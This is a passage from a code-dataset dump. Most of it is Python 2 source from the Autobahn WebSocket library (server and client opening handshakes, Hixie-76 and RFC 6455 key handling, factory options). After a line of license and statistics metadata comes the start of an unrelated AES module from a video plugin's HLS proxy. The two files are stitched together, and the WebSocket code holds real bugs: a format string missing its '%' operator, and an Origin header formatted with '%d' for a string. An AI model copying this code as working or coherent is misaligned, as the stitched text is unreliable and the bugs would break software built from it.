for kk in ['Sec-WebSocket-Key1', 'Sec-WebSocket-Key2']:
k = kk.lower()
if not self.http_headers.has_key(k):
return self.failHandshake("HTTP %s header missing" % kk)
if http_headers_cnt[k] > 1:
return self.failHandshake("HTTP %s header appears more than once in opening handshake request" % kk)
try:
key1 = self.parseHixie76Key(self.http_headers["sec-websocket-key1"].strip())
key2 = self.parseHixie76Key(self.http_headers["sec-websocket-key2"].strip())
except:
return self.failHandshake("could not parse Sec-WebSocket-Key1/2")
else:
if not self.http_headers.has_key("sec-websocket-key"):
return self.failHandshake("HTTP Sec-WebSocket-Key header missing")
if http_headers_cnt["sec-websocket-key"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Key header appears more than once in opening handshake request")
key = self.http_headers["sec-websocket-key"].strip()
if len(key) != 24: # 16 bytes => (ceil(128/24)*24)/6 == 24
return self.failHandshake("bad Sec-WebSocket-Key (length must be 24 ASCII chars) '%s'" % key)
if key[-2:] != "==": # 24 - ceil(128/6) == 2
return self.failHandshake("bad Sec-WebSocket-Key (invalid base64 encoding) '%s'" % key)
for c in key[:-2]:
if c not in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/":
return self.failHandshake("bad character '%s' in Sec-WebSocket-Key (invalid base64 encoding) '%s'" (c, key))
## For Hixie-76, we need 8 octets of HTTP request body to complete HS!
##
if self.websocket_version == 0:
if len(self.data) < end_of_header + 4 + 8:
return
else:
key3 = self.data[end_of_header + 4:end_of_header + 4 + 8]
## Ok, got complete HS input, remember rest (if any)
##
if self.websocket_version == 0:
self.data = self.data[end_of_header + 4 + 8:]
else:
self.data = self.data[end_of_header + 4:]
## WebSocket handshake validated => produce opening handshake response
## Now fire onConnect() on derived class, to give that class a chance to accept or deny
## the connection. onConnect() may throw, in which case the connection is denied, or it
## may return a protocol from the protocols provided by client or None.
##
try:
connectionRequest = ConnectionRequest(self.peer,
self.peerstr,
self.http_headers,
self.http_request_host,
self.http_request_path,
self.http_request_params,
self.websocket_version,
self.websocket_origin,
self.websocket_protocols,
self.websocket_extensions)
## onConnect() will return the selected subprotocol or None
## or raise an HttpException
##
protocol = self.onConnect(connectionRequest)
if protocol is not None and not (protocol in self.websocket_protocols):
raise Exception("protocol accepted must be from the list client sent or None")
self.websocket_protocol_in_use = protocol
except HttpException, e:
return self.failHandshake(e.reason, e.code)
#return self.sendHttpRequestFailure(e.code, e.reason)
except Exception, e:
log.msg("Exception raised in onConnect() - %s" % str(e))
return self.failHandshake("Internal Server Error", HTTP_STATUS_CODE_INTERNAL_SERVER_ERROR[0])
## build response to complete WebSocket handshake
##
response = "HTTP/1.1 %d Switching Protocols\x0d\x0a" % HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Upgrade: WebSocket\x0d\x0a"
response += "Connection: Upgrade\x0d\x0a"
if self.websocket_protocol_in_use is not None:
response += "Sec-WebSocket-Protocol: %s\x0d\x0a" % str(self.websocket_protocol_in_use)
if self.websocket_version == 0:
if self.websocket_origin:
## browser client provide the header, and expect it to be echo'ed
response += "Sec-WebSocket-Origin: %s\x0d\x0a" % str(self.websocket_origin)
if self.debugCodePaths:
log.msg('factory isSecure = %s port = %s' % (self.factory.isSecure, self.factory.port))
if (self.factory.isSecure and self.factory.port != 443) or ((not self.factory.isSecure) and self.factory.port != 80):
if self.debugCodePaths:
log.msg('factory running on non-default port')
response_port = ':' + str(self.factory.port)
else:
if self.debugCodePaths:
log.msg('factory running on default port')
response_port = ''
## FIXME: check this! But see below ..
if False:
response_host = str(self.factory.host)
response_path = str(self.factory.path)
else:
response_host = str(self.http_request_host)
response_path = str(self.http_request_uri)
location = "%s://%s%s%s" % ('wss' if self.factory.isSecure else 'ws', response_host, response_port, response_path)
# Safari is very picky about this one
response += "Sec-WebSocket-Location: %s\x0d\x0a" % location
## end of HTTP response headers
response += "\x0d\x0a"
## compute accept body
##
accept_val = struct.pack(">II", key1, key2) + key3
accept = hashlib.md5(accept_val).digest()
response_body = str(accept)
else:
## compute Sec-WebSocket-Accept
##
sha1 = hashlib.sha1()
sha1.update(key + WebSocketProtocol.WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
response += "Sec-WebSocket-Accept: %s\x0d\x0a" % sec_websocket_accept
if len(self.websocket_extensions_in_use) > 0:
response += "Sec-WebSocket-Extensions: %s\x0d\x0a" % ','.join(self.websocket_extensions_in_use)
## end of HTTP response headers
response += "\x0d\x0a"
response_body = ''
if self.debug:
log.msg("sending HTTP response:\n\n%s%s\n\n" % (response, binascii.b2a_hex(response_body)))
## save and send out opening HS data
##
self.http_response_data = response + response_body
self.sendData(self.http_response_data)
## opening handshake completed, move WebSockets connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
self.inside_message = False
if self.websocket_version != 0:
self.current_frame = None
## fire handler on derived class
##
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
def failHandshake(self, reason, code = HTTP_STATUS_CODE_BAD_REQUEST[0], responseHeaders = []):
"""
During opening handshake the client request was invalid, we send a HTTP
error response and then drop the connection.
"""
if self.debug:
log.msg("failing WebSockets opening handshake ('%s')" % reason)
self.sendHttpErrorResponse(code, reason, responseHeaders)
self.dropConnection(abort = False)
def sendHttpErrorResponse(self, code, reason, responseHeaders = []):
"""
Send out HTTP error response.
"""
response = "HTTP/1.1 %d %s\x0d\x0a" % (code, reason.encode("utf-8"))
for h in responseHeaders:
response += "%s: %s\x0d\x0a" % (h[0], h[1].encode("utf-8"))
response += "\x0d\x0a"
self.sendData(response)
def sendHtml(self, html):
raw = html.encode("utf-8")
response = "HTTP/1.1 %d %s\x0d\x0a" % (HTTP_STATUS_CODE_OK[0], HTTP_STATUS_CODE_OK[1])
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Content-Type: text/html; charset=UTF-8\x0d\x0a"
response += "Content-Length: %d\x0d\x0a" % len(raw)
response += "\x0d\x0a"
response += raw
self.sendData(response)
def sendServerStatus(self):
"""
Used to send out server status/version upon receiving a HTTP/GET without
upgrade to WebSocket header (and option serverStatus is True).
"""
html = """
<!DOCTYPE html>
<html>
<body>
<h1>Autobahn WebSockets %s</h1>
<p>
I am not Web server, but a WebSocket endpoint.
You can talk to me using the WebSocket <a href="http://tools.ietf.org/html/rfc6455">protocol</a>.
</p>
<p>
For more information, please visit <a href="http://autobahn.ws">my homepage</a>.
</p>
</body>
</html>
""" % str(autobahn.version)
self.sendHtml(html)
class WebSocketServerFactory(protocol.ServerFactory, WebSocketFactory):
"""
A Twisted factory for WebSockets server protocols.
"""
protocol = WebSocketServerProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketServerProtocol`.
"""
def __init__(self,
## WebSockect session parameters
url = None,
protocols = [],
server = "AutobahnPython/%s" % autobahn.version,
## debugging
debug = False,
debugCodePaths = False):
"""
Create instance of WebSocket server factory.
Note that you MUST set URL either here or using setSessionParameters() _before_ the factory is started.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake or None (default: "AutobahnWebSockets/x.x.x").
:type server: str
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.isServer = True
## seed RNG which is used for WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, protocols, server)
## default WebSocket protocol options
##
self.resetProtocolOptions()
## number of currently connected clients
##
self.countConnections = 0
def setSessionParameters(self, url = None, protocols = [], server = None):
"""
Set WebSocket session parameters.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake.
:type server: str
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
if path != "/":
raise Exception("path specified for server WebSocket URL")
if len(params) > 0:
raise Exception("query parameters specified for server WebSocket URL")
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.protocols = protocols
self.server = server
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.versions = WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.webStatus = True
self.utf8validateIncoming = True
self.requireMaskedClientFrames = True
self.maskServerFrames = False
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
versions = None,
allowHixie76 = None,
webStatus = None,
utf8validateIncoming = None,
maskServerFrames = None,
requireMaskedClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for new protocol instances.
:param versions: The WebSockets protocol versions accepted by the server (default: WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS).
:type versions: list of ints
:param allowHixie76: Allow to speak Hixie76 protocol version.
:type allowHixie76: bool
:param webStatus: Return server status/version on HTTP/GET without WebSocket upgrade header (default: True).
:type webStatus: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param maskServerFrames: Mask server-to-client frames (default: False).
:type maskServerFrames: bool
:param requireMaskedClientFrames: Require client-to-server frames to be masked (default: True).
:type requireMaskedClientFrames: bool
:param applyMask: Actually apply mask to payload when mask it present. Applies for outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performaing closing handshake (default: True).
:type failbyDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 0).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if versions is not None:
for v in versions:
if v not in WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS:
raise Exception("invalid WebSockets protocol version %s (allowed values: %s)" % (v, str(WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS)))
if v == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if set(versions) != set(self.versions):
self.versions = versions
if webStatus is not None and webStatus != self.webStatus:
self.webStatus = webStatus
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if requireMaskedClientFrames is not None and requireMaskedClientFrames != self.requireMaskedClientFrames:
self.requireMaskedClientFrames = requireMaskedClientFrames
if maskServerFrames is not None and maskServerFrames != self.maskServerFrames:
self.maskServerFrames = maskServerFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
def getConnectionCount(self):
"""
Get number of currently connected clients.
:returns: int -- Number of currently connected clients.
"""
return self.countConnections
def startFactory(self):
"""
Called by Twisted before starting to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
def stopFactory(self):
"""
Called by Twisted before stopping to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
class WebSocketClientProtocol(WebSocketProtocol):
"""
Client protocol for WebSockets.
"""
def onConnect(self, connectionResponse):
"""
Callback fired directly after WebSocket opening handshake when new WebSocket server
connection was established.
:param connectionResponse: WebSocket connection response information.
:type connectionResponse: instance of :class:`autobahn.websocket.ConnectionResponse`
"""
pass
def connectionMade(self):
"""
Called by Twisted when new TCP connection to server was established. Default
implementation will start the initial WebSocket opening handshake.
When overriding in derived class, make sure to call this base class
implementation _before_ your code.
"""
self.isServer = False
WebSocketProtocol.connectionMade(self)
if self.debug:
log.msg("connection to %s established" % self.peerstr)
self.startHandshake()
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection to server was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation _after_ your code.
"""
WebSocketProtocol.connectionLost(self, reason)
if self.debug:
log.msg("connection to %s lost" % self.peerstr)
def createHixieKey(self):
"""
Supposed to implement the crack smoker algorithm below. Well, crack
probably wasn't the stuff they smoked - dog poo?
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76#page-21
Items 16 - 22
"""
spaces1 = random.randint(1, 12)
max1 = int(4294967295L / spaces1)
number1 = random.randint(0, max1)
product1 = number1 * spaces1
key1 = str(product1)
rchars = filter(lambda x: (x >= 0x21 and x <= 0x2f) or (x >= 0x3a and x <= 0x7e), range(0,127))
for i in xrange(random.randint(1, 12)):
p = random.randint(0, len(key1) - 1)
key1 = key1[:p] + chr(random.choice(rchars)) + key1[p:]
for i in xrange(spaces1):
p = random.randint(1, len(key1) - 2)
key1 = key1[:p] + ' ' + key1[p:]
return (key1, number1)
def startHandshake(self):
"""
Start WebSockets opening handshake.
"""
## construct WS opening handshake HTTP header
##
request = "GET %s HTTP/1.1\x0d\x0a" % self.factory.resource.encode("utf-8")
if self.factory.useragent is not None and self.factory.useragent != "":
request += "User-Agent: %s\x0d\x0a" % self.factory.useragent.encode("utf-8")
request += "Host: %s:%d\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "Upgrade: WebSocket\x0d\x0a"
request += "Connection: Upgrade\x0d\x0a"
## handshake random key
##
if self.version == 0:
(self.websocket_key1, number1) = self.createHixieKey()
(self.websocket_key2, number2) = self.createHixieKey()
self.websocket_key3 = os.urandom(8)
accept_val = struct.pack(">II", number1, number2) + self.websocket_key3
self.websocket_expected_challenge_response = hashlib.md5(accept_val).digest()
request += "Sec-WebSocket-Key1: %s\x0d\x0a" % self.websocket_key1
request += "Sec-WebSocket-Key2: %s\x0d\x0a" % self.websocket_key2
else:
self.websocket_key = base64.b64encode(os.urandom(16))
request += "Sec-WebSocket-Key: %s\x0d\x0a" % self.websocket_key
## optional origin announced
##
if self.factory.origin:
if self.version > 10 or self.version == 0:
request += "Origin: %d\x0d\x0a" % self.factory.origin.encode("utf-8")
else:
request += "Sec-WebSocket-Origin: %d\x0d\x0a" % self.factory.origin.encode("utf-8")
## optional list of WS subprotocols announced
##
if len(self.factory.protocols) > 0:
request += "Sec-WebSocket-Protocol: %s\x0d\x0a" % ','.join(self.factory.protocols)
## set WS protocol version depending on WS spec version
##
if self.version != 0:
request += "Sec-WebSocket-Version: %d\x0d\x0a" % WebSocketProtocol.SPEC_TO_PROTOCOL_VERSION[self.version]
request += "\x0d\x0a"
if self.version == 0:
request += self.websocket_key3
self.http_request_data = request
if self.debug:
log.msg(self.http_request_data)
self.sendData(self.http_request_data)
def processHandshake(self):
"""
Process WebSockets opening handshake response from server.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_response_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP response:\n\n%s\n\n" % self.http_response_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_response_data)
## validate WebSocket opening handshake server response
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## Response Line
##
sl = self.http_status_line.split()
if len(sl) < 2:
return self.failHandshake("Bad HTTP response status line '%s'" % self.http_status_line)
## HTTP version
##
http_version = sl[0].strip()
if http_version != "HTTP/1.1":
return self.failHandshake("Unsupported HTTP version ('%s')" % http_version)
## HTTP status code
##
try:
status_code = int(sl[1].strip())
except:
return self.failHandshake("Bad HTTP status code ('%s')" % sl[1].strip())
if status_code != HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]:
## FIXME: handle redirects
## FIXME: handle authentication required
if len(sl) > 2:
reason = " - %s" % sl[2].strip()
else:
reason = ""
return self.failHandshake("WebSockets connection upgrade failed (%d%s)" % (status_code, reason))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
return self.failHandshake("HTTP Upgrade header missing")
if self.http_headers["upgrade"].strip().lower() != "websocket":
return self.failHandshake("HTTP Upgrade header different from 'websocket' (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection header does not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## compute Sec-WebSocket-Accept
##
if self.version != 0:
if not self.http_headers.has_key("sec-websocket-accept"):
return self.failHandshake("HTTP Sec-WebSocket-Accept header missing in opening handshake reply")
else:
if http_headers_cnt["sec-websocket-accept"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Accept header appears more than once in opening handshake reply")
sec_websocket_accept_got = self.http_headers["sec-websocket-accept"].strip()
sha1 = hashlib.sha1()
sha1.update(self.websocket_key + WebSocketProtocol.WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
if sec_websocket_accept_got != sec_websocket_accept:
return self.failHandshake("HTTP Sec-WebSocket-Accept bogus value : expected %s / got %s" % (sec_websocket_accept, sec_websocket_accept_got))
## handle "extensions in use" - if any
##
self.websocket_extensions_in_use = []
if self.version != 0:
if self.http_headers.has_key("sec-websocket-extensions"):
if http_headers_cnt["sec-websocket-extensions"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Extensions header appears more than once in opening handshake reply")
exts = self.http_headers["sec-websocket-extensions"].strip()
##
## we don't support any extension, but if we did, we needed
## to set self.websocket_extensions_in_use here, and don't fail the handshake
##
return self.failHandshake("server wants to use extensions (%s), but no extensions implemented" % exts)
## handle "subprotocol in use" - if any
##
self.websocket_protocol_in_use = None
if self.http_headers.has_key("sec-websocket-protocol"):
if http_headers_cnt["sec-websocket-protocol"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Protocol header appears more than once in opening handshake reply")
sp = str(self.http_headers["sec-websocket-protocol"].strip())
if sp != "":
if sp not in self.factory.protocols:
return self.failHandshake("subprotocol selected by server (%s) not in subprotocol list requested by client (%s)" % (sp, str(self.factory.protocols)))
else:
## ok, subprotocol in use
##
self.websocket_protocol_in_use = sp
## For Hixie-76, we need 16 octets of HTTP request body to complete HS!
##
if self.version == 0:
if len(self.data) < end_of_header + 4 + 16:
return
else:
challenge_response = self.data[end_of_header + 4:end_of_header + 4 + 16]
if challenge_response != self.websocket_expected_challenge_response:
return self.failHandshake("invalid challenge response received from server (Hixie-76)")
## Ok, got complete HS input, remember rest (if any)
##
if self.version == 0:
self.data = self.data[end_of_header + 4 + 16:]
else:
self.data = self.data[end_of_header + 4:]
## opening handshake completed, move WebSockets connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
self.inside_message = False
if self.version != 0:
self.current_frame = None
self.websocket_version = self.version
## we handle this symmetrical to server-side .. that is, give the
## client a chance to bail out .. i.e. on no subprotocol selected
## by server
try:
connectionResponse = ConnectionResponse(self.peer,
self.peerstr,
self.http_headers,
None, # FIXME
self.websocket_protocol_in_use,
self.websocket_extensions_in_use)
self.onConnect(connectionResponse)
except Exception, e:
## immediately close the WS connection
##
self.failConnection(1000, str(e))
else:
## fire handler on derived class
##
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
def failHandshake(self, reason):
"""
During opening handshake the server response is invalid and we drop the
connection.
"""
if self.debug:
log.msg("failing WebSockets opening handshake ('%s')" % reason)
self.dropConnection(abort = True)
class WebSocketClientFactory(protocol.ClientFactory, WebSocketFactory):
"""
A Twisted factory for WebSockets client protocols.
"""
protocol = WebSocketClientProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketClientProtocol`.
"""
def __init__(self,
## WebSockect session parameters
url = None,
origin = None,
protocols = [],
useragent = "AutobahnPython/%s" % autobahn.version,
## debugging
debug = False,
debugCodePaths = False):
"""
Create instance of WebSocket client factory.
Note that you MUST set URL either here or using setSessionParameters() _before_ the factory is started.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in WebSockets opening handshake or None (default: None).
:type origin: str
:param protocols: List of subprotocols the client should announce in WebSockets opening handshake (default: []).
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header or None (default: "AutobahnWebSockets/x.x.x").
:type useragent: str
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.isServer = False
## seed RNG which is used for WS opening handshake key and WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, origin, protocols, useragent)
## default WebSocket protocol options
##
self.resetProtocolOptions()
def setSessionParameters(self, url = None, origin = None, protocols = [], useragent = None):
"""
Set WebSocket session parameters.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in opening handshake.
:type origin: str
:param protocols: List of WebSocket subprotocols the client should announce in opening handshake.
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header during opening handshake.
:type useragent: str
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
self.resource = resource
self.path = path
self.params = params
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.resource = None
self.path = None
self.params = None
self.origin = origin
self.protocols = protocols
self.useragent = useragent
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.version = WebSocketProtocol.DEFAULT_SPEC_VERSION
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.utf8validateIncoming = True
self.acceptMaskedServerFrames = False
self.maskClientFrames = True
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.serverConnectionDropTimeout = 1
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
version = None,
allowHixie76 = None,
utf8validateIncoming = None,
acceptMaskedServerFrames = None,
maskClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
serverConnectionDropTimeout = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for _new_ protocol instances.
:param version: The WebSockets protocol spec (draft) version to be used (default: WebSocketProtocol.DEFAULT_SPEC_VERSION).
:type version: int
:param allowHixie76: Allow to speak Hixie76 protocol version.
:type allowHixie76: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param acceptMaskedServerFrames: Accept masked server-to-client frames (default: False).
:type acceptMaskedServerFrames: bool
:param maskClientFrames: Mask client-to-server frames (default: True).
:type maskClientFrames: bool
:param applyMask: Actually apply mask to payload when mask it present. Applies for outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performing closing handshake (default: True).
:type failbyDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param serverConnectionDropTimeout: When the client expects the server to drop the TCP, timeout in seconds (default: 1).
:type serverConnectionDropTimeout: float
:param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 0).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if version is not None:
if version not in WebSocketProtocol.SUPPORTED_SPEC_VERSIONS:
raise Exception("invalid WebSockets draft version %s (allowed values: %s)" % (version, str(WebSocketProtocol.SUPPORTED_SPEC_VERSIONS)))
if version == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if version != self.version:
self.version = version
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if acceptMaskedServerFrames is not None and acceptMaskedServerFrames != self.acceptMaskedServerFrames:
self.acceptMaskedServerFrames = acceptMaskedServerFrames
if maskClientFrames is not None and maskClientFrames != self.maskClientFrames:
self.maskClientFrames = maskClientFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if serverConnectionDropTimeout is not None and serverConnectionDropTimeout != self.serverConnectionDropTimeout:
self.serverConnectionDropTimeout = serverConnectionDropTimeout
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
def clientConnectionFailed(self, connector, reason):
"""
Called by Twisted when the connection to server has failed. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
def clientConnectionLost(self, connector, reason):
"""
Called by Twisted when the connection to server was lost. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
|
apache-2.0
| 1,140,141,229,421,386,400
| 36.960267
| 212
| 0.603311
| false
| 4.30817
| false
| false
| false
|
bruno-briner/plugin.video.brplay
|
resources/lib/hlsproxy/decrypter.py
|
1
|
16632
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Simple AES cipher implementation in pure Python following PEP-272 API
Based on: https://bitbucket.org/intgr/pyaes/ to compatible with PEP-8.
The goal of this module is to be as fast as reasonable in Python while still
being Pythonic and readable/understandable. It is licensed under the permissive
MIT license.
Hopefully the code is readable and commented enough that it can serve as an
introduction to the AES cipher for Python coders. In fact, it should go along
